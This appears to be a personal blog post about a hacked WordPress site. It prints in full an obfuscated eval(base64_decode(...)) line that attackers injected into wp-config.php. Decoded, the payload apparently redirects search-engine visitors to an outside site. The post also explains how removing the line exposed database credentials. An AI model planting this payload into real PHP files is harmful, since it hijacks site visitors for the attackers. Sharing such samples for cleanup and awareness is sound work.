Can’t login to wordpress – wp-admin just shows “The base configurations of the WordPress.”

Feb 21st, 2012 | By | Category: Linux / Freebsd

Well after 3 days of trying to track down why the sites on this shared account we’re taking up 100% of the cpu usage of a pretty beefy server I narrowed it down to one of my wordpress installs being compromised (Update your WP installs kids!).  Before I knew it was because of this I was trying to optimize the DB for that install and forgot the DB name so I went into my wp-config.php file and saw at the top of the file:

<?php                                       eval(base64_deco
de(“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6
cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hU
VFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIp
IG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikg
b3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilv
ciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Ig
c3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikg
b3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwi
Yml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIv
eWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRj
aCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlz
cGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRy
ZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3Ry
aXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vYnJvYWR3YXku
YmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ==”));

This is something you never want to see in your wp-config, or any wordpress install and so it because pretty clear what the culprit to this CPU usage was.  Anyways, these tricky fuckers appended this shit onto the first line, so when I was cleaning up my code the fast way I just had sed delete the entire line and by doing so it removed the <?php at the start of the file.  Boooooo..  This is why when I went to login to the admin area I was greeted with a text file starting with “The base configurations of the WordPress.” and then going on to list all of the info on the database name the mysql username and password.. Ugh.. Anyways, the solution is easy, just go back to your wp-config file and put that <?php back into the beginning of it 🙂

Tags: , , , ,

Leave a Comment